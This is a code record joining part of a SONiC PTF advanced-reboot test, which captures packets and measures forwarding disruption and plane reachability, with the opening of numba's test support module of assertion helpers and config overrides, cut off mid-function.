capture_pcap = "/tmp/capture_%s.pcap" % self.logfile_suffix if self.logfile_suffix is not None else "/tmp/capture.pcap"
capture_log = "/tmp/capture.log"
self.ptf_sniffer = "/root/ptftests/advanced_reboot_sniffer.py"
sniffer_command = ["python", self.ptf_sniffer, "-f", "'{}'".format(sniff_filter), "-p",\
capture_pcap, "-l", capture_log, "-t" , str(wait)]
subprocess.call(["rm", "-rf", capture_pcap]) # remove old capture
subprocess.call(sniffer_command)
self.packets = scapyall.rdpcap(capture_pcap)
self.log("Number of all packets captured: {}".format(len(self.packets)))
def send_and_sniff(self):
"""
This method starts two background threads in parallel:
one for sending, another for collecting the sent packets.
"""
self.sender_thr = threading.Thread(target = self.send_in_background)
self.sniff_thr = threading.Thread(target = self.sniff_in_background)
self.sniffer_started = threading.Event() # Event for the sniff_in_background status.
self.sniff_thr.start()
self.sender_thr.start()
self.sniff_thr.join()
self.sender_thr.join()
def check_tcp_payload(self, packet):
"""
This method is used by examine_flow() method.
It returns True if the packet is not corrupted and carries a valid sequential TCP payload, as created by the generate_bidirectional() method.
"""
try:
return int(str(packet[scapyall.TCP].payload)) in range(self.packets_to_send)
except Exception as err:
return False
def no_flood(self, packet):
"""
This method filters packets which are unique (i.e. no floods).
"""
if (not int(str(packet[scapyall.TCP].payload)) in self.unique_id) and (packet[scapyall.Ether].src == self.dut_mac):
# This is a unique (no flooded) received packet.
self.unique_id.append(int(str(packet[scapyall.TCP].payload)))
return True
elif packet[scapyall.Ether].dst == self.dut_mac:
# This is a sent packet.
return True
else:
return False
def examine_flow(self, filename = None):
"""
This method examines pcap file (if given), or self.packets scapy file.
The method compares the TCP payloads of the packets one by one (assuming all payloads are consecutive integers),
and any losses found are treated as disruptions in dataplane forwarding.
All disruptions are saved to self.lost_packets dictionary, in format:
disrupt_start_id = (missing_packets_count, disrupt_time, disrupt_start_timestamp, disrupt_stop_timestamp)
"""
if filename:
all_packets = scapyall.rdpcap(filename)
elif self.packets:
all_packets = self.packets
else:
self.log("Filename and self.packets are not defined.")
self.fails['dut'].add("Filename and self.packets are not defined")
return None
# Filter out packets and remove floods:
self.unique_id = list() # This list will contain all unique Payload ID, to filter out received floods.
filtered_packets = [ pkt for pkt in all_packets if
scapyall.TCP in pkt and
not scapyall.ICMP in pkt and
pkt[scapyall.TCP].sport == 1234 and
pkt[scapyall.TCP].dport == 5000 and
self.check_tcp_payload(pkt) and
self.no_flood(pkt)
]
if self.vnet:
decap_packets = [ scapyall.Ether(str(pkt.payload.payload.payload)[8:]) for pkt in all_packets if
scapyall.UDP in pkt and
pkt[scapyall.UDP].sport == 1234
]
filtered_decap_packets = [ pkt for pkt in decap_packets if
scapyall.TCP in pkt and
not scapyall.ICMP in pkt and
pkt[scapyall.TCP].sport == 1234 and
pkt[scapyall.TCP].dport == 5000 and
self.check_tcp_payload(pkt) and
self.no_flood(pkt)
]
filtered_packets = filtered_packets + filtered_decap_packets
# Re-arrange packets, if delayed, by Payload ID and Timestamp:
packets = sorted(filtered_packets, key = lambda packet: (int(str(packet[scapyall.TCP].payload)), packet.time ))
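# Sorting primarily by payload ID (and by timestamp for duplicates) lets the
# loop below detect gaps in the sequence and treat them as forwarding disruptions.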
self.lost_packets = dict()
self.max_disrupt, self.total_disruption = 0, 0
sent_packets = dict()
self.fails['dut'].add("Sniffer failed to capture any traffic")
self.assertTrue(packets, "Sniffer failed to capture any traffic")
self.fails['dut'].clear()
if packets:
prev_payload, prev_time = 0, 0
sent_payload = 0
received_counter = 0 # Counts packets from dut.
sent_counter = 0
received_t1_to_vlan = 0
received_vlan_to_t1 = 0
missed_vlan_to_t1 = 0
missed_t1_to_vlan = 0
self.disruption_start, self.disruption_stop = None, None
for packet in packets:
if packet[scapyall.Ether].dst == self.dut_mac:
# This is a sent packet - keep track of it as payload_id:timestamp.
sent_payload = int(str(packet[scapyall.TCP].payload))
sent_packets[sent_payload] = packet.time
sent_counter += 1
continue
if packet[scapyall.Ether].src == self.dut_mac:
# This is a received packet.
received_time = packet.time
received_payload = int(str(packet[scapyall.TCP].payload))
if (received_payload % 5) == 0 : # From vlan to T1.
received_vlan_to_t1 += 1
else:
received_t1_to_vlan += 1
received_counter += 1
if not (received_payload and received_time):
# This is the first valid received packet.
prev_payload = received_payload
prev_time = received_time
continue
if received_payload - prev_payload > 1:
# Packets in a row are missing, a disruption.
lost_id = (received_payload -1) - prev_payload # How many packets lost in a row.
disrupt = (sent_packets[received_payload] - sent_packets[prev_payload + 1]) # How long disrupt lasted.
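# The disruption duration is measured between the send timestamps of the first
# lost packet (prev_payload + 1) and of the first packet received after the gap.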
# Add disrupt to the dict:
self.lost_packets[prev_payload] = (lost_id, disrupt, received_time - disrupt, received_time)
self.log("Disruption between packet ID %d and %d. For %.4f " % (prev_payload, received_payload, disrupt))
for lost_index in range(prev_payload + 1, received_payload):
if (lost_index % 5) == 0 : # lost received for packet sent from vlan to T1.
missed_vlan_to_t1 += 1
else:
missed_t1_to_vlan += 1
self.log("")
if not self.disruption_start:
self.disruption_start = datetime.datetime.fromtimestamp(prev_time)
self.disruption_stop = datetime.datetime.fromtimestamp(received_time)
prev_payload = received_payload
prev_time = received_time
self.log("**************** Packet received summary: ********************")
self.log("*********** Sent packets captured - {}".format(sent_counter))
self.log("*********** received packets captured - t1-to-vlan - {}".format(received_t1_to_vlan))
self.log("*********** received packets captured - vlan-to-t1 - {}".format(received_vlan_to_t1))
self.log("*********** Missed received packets - t1-to-vlan - {}".format(missed_t1_to_vlan))
self.log("*********** Missed received packets - vlan-to-t1 - {}".format(missed_vlan_to_t1))
self.log("**************************************************************")
self.fails['dut'].add("Sniffer failed to filter any traffic from DUT")
self.assertTrue(received_counter, "Sniffer failed to filter any traffic from DUT")
self.fails['dut'].clear()
self.disrupts_count = len(self.lost_packets) # Total disrupt counter.
if self.lost_packets:
# Find the longest loss with the longest time:
max_disrupt_from_id, (self.max_lost_id, self.max_disrupt_time, self.no_routing_start, self.no_routing_stop) = \
max(self.lost_packets.items(), key = lambda item:item[1][0:2])
self.total_disrupt_packets = sum([item[0] for item in self.lost_packets.values()])
self.total_disrupt_time = sum([item[1] for item in self.lost_packets.values()])
self.log("Disruptions happen between %s and %s after the reboot." % \
(str(self.disruption_start - self.reboot_start), str(self.disruption_stop - self.reboot_start)))
else:
self.max_lost_id = 0
self.max_disrupt_time = 0
self.total_disrupt_packets = 0
self.total_disrupt_time = 0
self.log("Gaps in forwarding not found.")
self.log("Total incoming packets captured %d" % received_counter)
if packets:
filename = '/tmp/capture_filtered.pcap' if self.logfile_suffix is None else "/tmp/capture_filtered_%s.pcap" % self.logfile_suffix
scapyall.wrpcap(filename, packets)
self.log("Filtered pcap dumped to %s" % filename)
def check_forwarding_stop(self, signal):
self.asic_start_recording_vlan_reachability()
while not signal.is_set():
state = self.asic_state.get()
for _, q in self.ssh_jobs:
self.put_nowait(q, 'check_stop')
if state == 'down':
break
time.sleep(self.TIMEOUT)
self.asic_stop_recording_vlan_reachability()
return self.asic_state.get_state_time(state), self.get_asic_vlan_reachability()
def check_forwarding_resume(self, signal):
while not signal.is_set():
state = self.asic_state.get()
if state != 'down':
break
time.sleep(self.TIMEOUT)
return self.asic_state.get_state_time(state), self.get_asic_vlan_reachability()
def ping_data_plane(self, light_probe=True):
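# Probe the data plane in both directions. With light_probe enabled (fast-reboot),
# the T1 -> servers probe is skipped whenever the servers -> T1 probe already
# returned zero replies.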
self.dataplane.flush()
replies_from_servers = self.pingFromServers()
if replies_from_servers > 0 or not light_probe:
replies_from_upper = self.pingFromUpperTier()
else:
replies_from_upper = 0
return replies_from_servers, replies_from_upper
def wait_dut_to_warm_up(self):
# When the DUT is freshly rebooted, it needs some time to warm up
# towards the PTF docker. In practice this warm-up has been observed to
# take up to ~70 seconds.
fail = None
dut_stabilize_secs = int(self.test_params['dut_stabilize_secs'])
warm_up_timeout_secs = int(self.test_params['warm_up_timeout_secs'])
start_time = datetime.datetime.now()
up_time = None
# First wait until DUT data/control planes are up
while True:
dataplane = self.asic_state.get()
ctrlplane = self.cpu_state.get()
elapsed = (datetime.datetime.now() - start_time).total_seconds()
if dataplane == 'up' and ctrlplane == 'up':
if not up_time:
up_time = datetime.datetime.now()
up_secs = (datetime.datetime.now() - up_time).total_seconds()
if up_secs > dut_stabilize_secs:
break
else:
# reset up_time
up_time = None
if elapsed > warm_up_timeout_secs:
raise Exception("Control plane didn't come up within warm up timeout")
time.sleep(1)
# check until flooding is over. Flooding happens when the FDB entry of a
# certain host is not yet learnt by the ASIC, so the packet is sent to
# all VLAN ports.
uptime = datetime.datetime.now()
while True:
elapsed = (datetime.datetime.now() - start_time).total_seconds()
if not self.asic_state.is_flooding() and elapsed > dut_stabilize_secs:
break
if elapsed > warm_up_timeout_secs:
if self.allow_vlan_flooding:
break
raise Exception("Data plane didn't stop flooding within warm up timeout")
time.sleep(1)
dataplane = self.asic_state.get()
ctrlplane = self.cpu_state.get()
if not dataplane == 'up':
fail = "Data plane"
elif not ctrlplane == 'up':
fail = "Control plane"
if fail is not None:
raise Exception("{} went down while waiting for flooding to stop".format(fail))
if self.asic_state.get_state_time('up') > uptime:
fail = "Data plane"
elif self.cpu_state.get_state_time('up') > uptime:
fail = "Control plane"
if fail is not None:
raise Exception("{} flapped while waiting for the warm up".format(fail))
# Everything is good
def clear_dut_counters(self):
# Clear the counters after the WARM UP is complete
# this is done so that drops can be accurately calculated
# after reboot test is finished
clear_counter_cmds = [ "sonic-clear counters",
"sonic-clear queuecounters",
"sonic-clear dropcounters",
"sonic-clear rifcounters",
"sonic-clear pfccounters"
]
if 'broadcom' in self.test_params['asic_type']:
clear_counter_cmds.append("bcmcmd 'clear counters'")
for cmd in clear_counter_cmds:
self.dut_connection.execCommand(cmd)
def check_alive(self):
# This function checks that the DUT routes packets in both directions.
#
# Sometimes the first attempt fails because ARP responses to the DUT are not fast enough.
# After that the function expects to see steady replies.
# If an issue with the data plane is seen after successful replies were
# already observed, the DUT is considered unhealthy.
#
# Sometimes the DUT returns more replies than requests, most likely because
# the FDB table is not yet fully populated.
# The function waits until this settles.
uptime = None
for counter in range(self.nr_tests * 2):
state = self.asic_state.get()
if state == 'up':
if not uptime:
uptime = self.asic_state.get_state_time(state)
else:
if uptime:
raise Exception("Data plane stopped working")
time.sleep(2)
# wait until FDB entries are populated
for _ in range(self.nr_tests * 10): # wait for some time
if self.asic_state.is_flooding():
time.sleep(2)
else:
break
else:
raise Exception("DUT is flooding")
def get_asic_vlan_reachability(self):
return self.asic_vlan_reach
def asic_start_recording_vlan_reachability(self):
with self.vlan_lock:
self.asic_vlan_reach = []
self.recording = True
def asic_stop_recording_vlan_reachability(self):
with self.vlan_lock:
self.recording = False
def try_record_asic_vlan_reachability(self, t1_to_vlan):
with self.vlan_lock:
if self.recording:
self.asic_vlan_reach.append(t1_to_vlan)
def log_asic_state_change(self, reachable, partial=False, t1_to_vlan=0, flooding=False):
old = self.asic_state.get()
if reachable:
state = 'up' if not partial else 'partial'
else:
state = 'down'
self.try_record_asic_vlan_reachability(t1_to_vlan)
self.asic_state.set_flooding(flooding)
if old != state:
self.log("Data plane state transition from %s to %s (%d)" % (old, state, t1_to_vlan))
self.asic_state.set(state)
def log_cpu_state_change(self, reachable, partial=False, flooding=False):
old = self.cpu_state.get()
if reachable:
state = 'up' if not partial else 'partial'
else:
state = 'down'
self.cpu_state.set_flooding(flooding)
if old != state:
self.log("Control plane state transition from %s to %s" % (old, state))
self.cpu_state.set(state)
def log_vlan_state_change(self, reachable):
old = self.vlan_state.get()
if reachable:
state = 'up'
else:
state = 'down'
if old != state:
self.log("VLAN ARP state transition from %s to %s" % (old, state))
self.vlan_state.set(state)
def reachability_watcher(self):
# This function watches the reachability of the CPU port, and ASIC. It logs the state
# changes for future analysis
self.watcher_is_stopped.clear() # Watcher is running.
while self.watching:
if self.dataplane_io_lock.acquire(False):
vlan_to_t1, t1_to_vlan = self.ping_data_plane(self.light_probe)
reachable = (t1_to_vlan > self.nr_vl_pkts * 0.7 and
vlan_to_t1 > self.nr_pc_pkts * 0.7)
partial = (reachable and
(t1_to_vlan < self.nr_vl_pkts or
vlan_to_t1 < self.nr_pc_pkts))
flooding = (reachable and
(t1_to_vlan > self.nr_vl_pkts or
vlan_to_t1 > self.nr_pc_pkts))
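# The 0.7 factor is an empirical threshold: receiving more than 70% of the probe
# replies counts the plane as reachable, fewer replies than probes marks it
# partial, and more replies than probes indicates flooding.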
self.log_asic_state_change(reachable, partial, t1_to_vlan, flooding)
self.dataplane_io_lock.release()
total_rcv_pkt_cnt = self.pingDut()
reachable = total_rcv_pkt_cnt > 0 and total_rcv_pkt_cnt > self.ping_dut_pkts * 0.7
partial = total_rcv_pkt_cnt > 0 and total_rcv_pkt_cnt < self.ping_dut_pkts
flooding = reachable and total_rcv_pkt_cnt > self.ping_dut_pkts
self.log_cpu_state_change(reachable, partial, flooding)
total_rcv_pkt_cnt = self.arpPing()
reachable = total_rcv_pkt_cnt >= self.arp_ping_pkts
self.log_vlan_state_change(reachable)
self.watcher_is_running.set() # Watcher is running.
self.watcher_is_stopped.set() # Watcher has stopped.
self.watcher_is_running.clear() # Watcher has stopped.
def pingFromServers(self):
for i in xrange(self.nr_pc_pkts):
testutils.send_packet(self, self.from_server_src_port, self.from_vlan_packet)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.from_vlan_exp_packet, self.from_server_dst_ports, timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d servers->t1" % (self.nr_pc_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
def pingFromUpperTier(self):
for entry in self.from_t1:
testutils.send_packet(self, *entry)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.from_t1_exp_packet, self.vlan_ports, timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d t1->servers" % (self.nr_vl_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
def pingDut(self):
if "allow_mac_jumping" in self.test_params and self.test_params['allow_mac_jumping']:
for i in xrange(self.ping_dut_pkts):
testutils.send_packet(self, self.random_port(self.vlan_ports), self.ping_dut_macjump_packet)
else:
for i in xrange(self.ping_dut_pkts):
src_port, packet = random.choice(self.ping_dut_packets)
testutils.send_packet(self, src_port, packet)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.ping_dut_exp_packet, self.vlan_ports, timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d ping DUT" % (self.ping_dut_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
def arpPing(self):
for i in xrange(self.arp_ping_pkts):
testutils.send_packet(self, self.arp_src_port, self.arp_ping)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.arp_resp, [self.arp_src_port], timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d arp ping" % (self.arp_ping_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
|
support.py
|
"""
Assorted utilities for use in tests.
"""
from __future__ import print_function
import cmath
import contextlib
import enum
import errno
import gc
import math
import os
import shutil
import subprocess
import sys
import tempfile
import time
import traceback
import io
import ctypes
import multiprocessing as mp
from contextlib import contextmanager
import numpy as np
from numba import config, errors, typing, utils, numpy_support, testing
from numba.compiler import compile_extra, compile_isolated, Flags, DEFAULT_FLAGS
from numba.targets import cpu
import numba.unittest_support as unittest
from numba.runtime import rtsys
from numba.six import PY2
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")
force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")
no_pyobj_flags = Flags()
nrt_flags = Flags()
nrt_flags.set("nrt")
tag = testing.make_tag_decorator(['important', 'long_running'])
_windows_py27 = (sys.platform.startswith('win32') and
sys.version_info[:2] == (2, 7))
_32bit = sys.maxsize <= 2 ** 32
_reason = 'parfors not supported'
skip_parfors_unsupported = unittest.skipIf(_32bit or _windows_py27, _reason)
class CompilationCache(object):
"""
A cache of compilation results for various signatures and flags.
This can make tests significantly faster (or less slow).
"""
def __init__(self):
self.typingctx = typing.Context()
self.targetctx = cpu.CPUContext(self.typingctx)
self.cr_cache = {}
def compile(self, func, args, return_type=None, flags=DEFAULT_FLAGS):
"""
Compile the function or retrieve an already compiled result
from the cache.
"""
from numba.targets.registry import cpu_target
cache_key = (func, args, return_type, flags)
try:
cr = self.cr_cache[cache_key]
except KeyError:
# Register the contexts in case for nested @jit or @overload calls
# (same as compile_isolated())
with cpu_target.nested_context(self.typingctx, self.targetctx):
cr = compile_extra(self.typingctx, self.targetctx, func,
args, return_type, flags, locals={})
self.cr_cache[cache_key] = cr
return cr
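# Usage sketch (my_func is a hypothetical plain Python function; numba.types is
# assumed to be imported as `types`):
#     cache = CompilationCache()
#     cr = cache.compile(my_func, (types.int64,), flags=no_pyobj_flags)
#     result = cr.entry_point(42)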
class TestCase(unittest.TestCase):
longMessage = True
# A random state yielding the same random numbers for any test case.
# Use as `self.random.<method name>`
@utils.cached_property
def random(self):
return np.random.RandomState(42)
def reset_module_warnings(self, module):
"""
Reset the warnings registry of a module. This can be necessary
as the warnings module is buggy in that regard.
See http://bugs.python.org/issue4180
"""
if isinstance(module, str):
module = sys.modules[module]
try:
del module.__warningregistry__
except AttributeError:
pass
@contextlib.contextmanager
def assertTypingError(self):
"""
A context manager that asserts the enclosed code block fails
compiling in nopython mode.
"""
_accepted_errors = (errors.LoweringError, errors.TypingError,
TypeError, NotImplementedError)
with self.assertRaises(_accepted_errors) as cm:
yield cm
@contextlib.contextmanager
def assertRefCount(self, *objects):
"""
A context manager that asserts the given objects have the
same reference counts before and after executing the
enclosed block.
"""
old_refcounts = [sys.getrefcount(x) for x in objects]
yield
new_refcounts = [sys.getrefcount(x) for x in objects]
for old, new, obj in zip(old_refcounts, new_refcounts, objects):
if old != new:
self.fail("Refcount changed from %d to %d for object: %r"
% (old, new, obj))
@contextlib.contextmanager
def assertNoNRTLeak(self):
"""
A context manager that asserts no NRT leak was created during
the execution of the enclosed block.
"""
old = rtsys.get_allocation_stats()
yield
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free,
"number of data allocs != number of data frees")
self.assertEqual(total_mi_alloc, total_mi_free,
"number of meminfo allocs != number of meminfo frees")
_bool_types = (bool, np.bool_)
_exact_typesets = [_bool_types, utils.INT_TYPES, (str,), (np.integer,), (utils.text_type,)]
_approx_typesets = [(float,), (complex,), (np.inexact,)]
_sequence_typesets = [(tuple, list)]
_float_types = (float, np.floating)
_complex_types = (complex, np.complexfloating)
def _detect_family(self, numeric_object):
"""
Return a string describing the type family the given object belongs to.
Possible return values are: "ndarray", "enum", "sequence", "exact",
"complex", "approximate", and "unknown".
"""
if isinstance(numeric_object, np.ndarray):
return "ndarray"
if isinstance(numeric_object, enum.Enum):
return "enum"
for tp in self._sequence_typesets:
if isinstance(numeric_object, tp):
return "sequence"
for tp in self._exact_typesets:
if isinstance(numeric_object, tp):
return "exact"
for tp in self._complex_types:
if isinstance(numeric_object, tp):
return "complex"
for tp in self._approx_typesets:
if isinstance(numeric_object, tp):
return "approximate"
return "unknown"
def _fix_dtype(self, dtype):
"""
Fix the given *dtype* for comparison.
"""
# Under 64-bit Windows, Numpy may return either int32 or int64
# arrays depending on the function.
if (sys.platform == 'win32' and sys.maxsize > 2**32 and
dtype == np.dtype('int32')):
return np.dtype('int64')
else:
return dtype
def _fix_strides(self, arr):
"""
Return the strides of the given array, fixed for comparison.
Strides for 0- or 1-sized dimensions are ignored.
"""
if arr.size == 0:
return [0] * arr.ndim
else:
return [stride / arr.itemsize
for (stride, shape) in zip(arr.strides, arr.shape)
if shape > 1]
def assertStridesEqual(self, first, second):
"""
Test that two arrays have the same shape and strides.
"""
self.assertEqual(first.shape, second.shape, "shapes differ")
self.assertEqual(first.itemsize, second.itemsize, "itemsizes differ")
self.assertEqual(self._fix_strides(first), self._fix_strides(second),
"strides differ")
def assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None
):
"""
Versatile equality testing function with more built-in checks than
standard assertEqual().
For arrays, test that layout, dtype, shape are identical, and
recursively call assertPreciseEqual() on the contents.
For other sequences, recursively call assertPreciseEqual() on
the contents.
For scalars, test that the two scalars have similar types and are
equal up to a computed precision.
If the scalars are instances of exact types or if *prec* is
'exact', they are compared exactly.
If the scalars are instances of inexact types (float, complex)
and *prec* is not 'exact', then the number of significant bits
is computed according to the value of *prec*: 53 bits if *prec*
is 'double', 24 bits if *prec* is 'single'. This number of bits
can be lowered by raising the *ulps* value.
Set *ignore_sign_on_zero* to True if zeros should be considered
equal regardless of their sign bit.
*abs_tol*, if set, defines an absolute tolerance: when the absolute
difference between *first* and *second* is below it, the values are
considered equal. It can be a float, or the string "eps" to use the
machine precision of type(first). This is intended for comparing
small numbers whose magnitude is below machine precision.
Any value of *prec* other than 'exact', 'single' or 'double'
will raise an error.
"""
try:
self._assertPreciseEqual(first, second, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
except AssertionError as exc:
failure_msg = str(exc)
# Fall off of the 'except' scope to avoid Python 3 exception
# chaining.
else:
return
# Decorate the failure message with more information
self.fail("when comparing %s and %s: %s" % (first, second, failure_msg))
def _assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None):
"""Recursive workhorse for assertPreciseEqual()."""
def _assertNumberEqual(first, second, delta=None):
if (delta is None or first == second == 0.0
or math.isinf(first) or math.isinf(second)):
self.assertEqual(first, second, msg=msg)
# For signed zeros
if not ignore_sign_on_zero:
try:
if math.copysign(1, first) != math.copysign(1, second):
self.fail(
self._formatMessage(msg,
"%s != %s" %
(first, second)))
except TypeError:
pass
else:
self.assertAlmostEqual(first, second, delta=delta, msg=msg)
first_family = self._detect_family(first)
second_family = self._detect_family(second)
assertion_message = "Type Family mismatch. (%s != %s)" % (first_family,
second_family)
if msg:
assertion_message += ': %s' % (msg,)
self.assertEqual(first_family, second_family, msg=assertion_message)
# We now know they are in the same comparison family
compare_family = first_family
# For recognized sequences, recurse
if compare_family == "ndarray":
dtype = self._fix_dtype(first.dtype)
self.assertEqual(dtype, self._fix_dtype(second.dtype))
self.assertEqual(first.ndim, second.ndim,
"different number of dimensions")
self.assertEqual(first.shape, second.shape,
"different shapes")
self.assertEqual(first.flags.writeable, second.flags.writeable,
"different mutability")
# itemsize is already checked by the dtype test above
self.assertEqual(self._fix_strides(first),
self._fix_strides(second), "different strides")
if first.dtype != dtype:
first = first.astype(dtype)
if second.dtype != dtype:
second = second.astype(dtype)
for a, b in zip(first.flat, second.flat):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "sequence":
self.assertEqual(len(first), len(second), msg=msg)
for a, b in zip(first, second):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "exact":
exact_comparison = True
elif compare_family in ["complex", "approximate"]:
exact_comparison = False
elif compare_family == "enum":
self.assertIs(first.__class__, second.__class__)
self._assertPreciseEqual(first.value, second.value,
prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "unknown":
# Assume these are non-numeric types: we will fall back
# on regular unittest comparison.
self.assertIs(first.__class__, second.__class__)
exact_comparison = True
else:
assert 0, "unexpected family"
# If a Numpy scalar, check the dtype is exactly the same too
# (required for datetime64 and timedelta64).
if hasattr(first, 'dtype') and hasattr(second, 'dtype'):
self.assertEqual(first.dtype, second.dtype)
# Mixing bools and non-bools should always fail
if (isinstance(first, self._bool_types) !=
isinstance(second, self._bool_types)):
assertion_message = ("Mismatching return types (%s vs. %s)"
% (first.__class__, second.__class__))
if msg:
assertion_message += ': %s' % (msg,)
self.fail(assertion_message)
try:
if cmath.isnan(first) and cmath.isnan(second):
# The NaNs will compare unequal, skip regular comparison
return
except TypeError:
# Not floats.
pass
# if absolute comparison is set, use it
if abs_tol is not None:
if abs_tol == "eps":
rtol = np.finfo(type(first)).eps
elif isinstance(abs_tol, float):
rtol = abs_tol
else:
raise ValueError("abs_tol is not \"eps\" or a float, found %s"
% abs_tol)
if abs(first - second) < rtol:
return
exact_comparison = exact_comparison or prec == 'exact'
if not exact_comparison and prec != 'exact':
if prec == 'single':
bits = 24
elif prec == 'double':
bits = 53
else:
raise ValueError("unsupported precision %r" % (prec,))
k = 2 ** (ulps - bits - 1)
delta = k * (abs(first) + abs(second))
else:
delta = None
if isinstance(first, self._complex_types):
_assertNumberEqual(first.real, second.real, delta)
_assertNumberEqual(first.imag, second.imag, delta)
elif isinstance(first, (np.timedelta64, np.datetime64)):
# Since NumPy 1.16, NaT == NaT is False, so a special comparison is needed
if numpy_support.version >= (1, 16) and np.isnat(first):
self.assertEqual(np.isnat(first), np.isnat(second))
else:
_assertNumberEqual(first, second, delta)
else:
_assertNumberEqual(first, second, delta)
def run_nullary_func(self, pyfunc, flags):
"""
Compile the 0-argument *pyfunc* with the given *flags*, and check
it returns the same result as the pure Python function.
The got and expected results are returned.
"""
cr = compile_isolated(pyfunc, (), flags=flags)
cfunc = cr.entry_point
expected = pyfunc()
got = cfunc()
self.assertPreciseEqual(got, expected)
return got, expected
if PY2:
@contextmanager
def subTest(self, *args, **kwargs):
"""A stub TestCase.subTest backport.
This implementation is a no-op.
"""
yield
class SerialMixin(object):
"""Mixin to mark test for serial execution.
"""
_numba_parallel_test_ = False
# Various helpers
@contextlib.contextmanager
def override_config(name, value):
"""
Return a context manager that temporarily sets Numba config variable
*name* to *value*. *name* must be the name of an existing variable
in numba.config.
"""
old_value = getattr(config, name)
setattr(config, name, value)
try:
yield
finally:
setattr(config, name, old_value)
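# Usage sketch (DEBUG_CACHE is a numba.config variable, also used by
# capture_cache_log() below):
#     with override_config('DEBUG_CACHE', True):
#         ...  # cache debug output is enabled inside this block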
@contextlib.contextmanager
def override_env_config(name, value):
"""
Return a context manager that temporarily sets the Numba config environment
variable *name* to *value*.
"""
old = os.environ.get(name)
os.environ[name] = value
config.reload_config()
try:
yield
finally:
if old is None:
# If it wasn't set originally, delete the environ var
del os.environ[name]
else:
# Otherwise, restore to the old value
os.environ[name] = old
# Always reload config
config.reload_config()
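# Usage sketch (NUMBA_CACHE_DIR is also used by run_in_new_process_caching()
# below; the path here is a hypothetical example value):
#     with override_env_config('NUMBA_CACHE_DIR', '/tmp/numba-cache-example'):
#         ...  # compilation caches land in the temporary directory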
def compile_function(name, code, globs):
"""
Given a *code* string, compile it with globals *globs* and return
the function named *name*.
"""
co = compile(code.rstrip(), "<string>", "single")
ns = {}
eval(co, globs, ns)
return ns[name]
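# Usage sketch: build a throwaway function from a source string.
#     add_one = compile_function('add_one', 'def add_one(x): return x + 1', {})
#     assert add_one(2) == 3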
def tweak_code(func, codestring=None, consts=None):
"""
Tweak the code object of the given function by replacing its
*codestring* (a bytes object) and *consts* tuple, optionally.
"""
co = func.__code__
tp = type(co)
if codestring is None:
codestring = co.co_code
if consts is None:
consts = co.co_consts
if sys.version_info >= (3,):
new_code = tp(co.co_argcount, co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
else:
new_code = tp(co.co_argcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
func.__code__ = new_code
_trashcan_dir = 'numba-tests'
if os.name == 'nt':
# Under Windows, gettempdir() points to the user-local temp dir
_trashcan_dir = os.path.join(tempfile.gettempdir(), _trashcan_dir)
else:
# Mix the UID into the directory name to allow different users to
# run the test suite without permission errors (issue #1586)
_trashcan_dir = os.path.join(tempfile.gettempdir(),
"%s.%s" % (_trashcan_dir, os.getuid()))
# Stale temporary directories are deleted once they are older than this value.
# The test suite probably won't ever take longer than this...
_trashcan_timeout = 24 * 3600 # 1 day
def _create_trashcan_dir():
try:
os.mkdir(_trashcan_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _purge_trashcan_dir():
freshness_threshold = time.time() - _trashcan_timeout
for fn in sorted(os.listdir(_trashcan_dir)):
fn = os.path.join(_trashcan_dir, fn)
try:
st = os.stat(fn)
if st.st_mtime < freshness_threshold:
shutil.rmtree(fn, ignore_errors=True)
except OSError:
# In parallel testing, several processes can attempt to
# remove the same entry at once, ignore.
pass
def _create_trashcan_subdir(prefix):
_purge_trashcan_dir()
path = tempfile.mkdtemp(prefix=prefix + '-', dir=_trashcan_dir)
return path
def temp_directory(prefix):
"""
Create a temporary directory with the given *prefix* that will survive
at least as long as this process invocation. The temporary directory
will be eventually deleted when it becomes stale enough.
This is necessary because a DLL file can't be deleted while in use
under Windows.
An interesting side-effect is to be able to inspect the test files
shortly after a test suite run.
"""
_create_trashcan_dir()
return _create_trashcan_subdir(prefix)
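# Usage sketch: the directory persists past this process and is reaped later by
# _purge_trashcan_dir() once it is older than _trashcan_timeout.
#     workdir = temp_directory('my_test_prefix')
#     ...  # write DLLs / cache files under workdir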
def import_dynamic(modname):
"""
Import and return a module of the given name. Care is taken to
avoid issues due to Python's internal directory caching.
"""
if sys.version_info >= (3, 3):
import importlib
importlib.invalidate_caches()
__import__(modname)
return sys.modules[modname]
# From CPython
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, utils.StringIO())
try:
yield getattr(sys, stream_name)
finally:
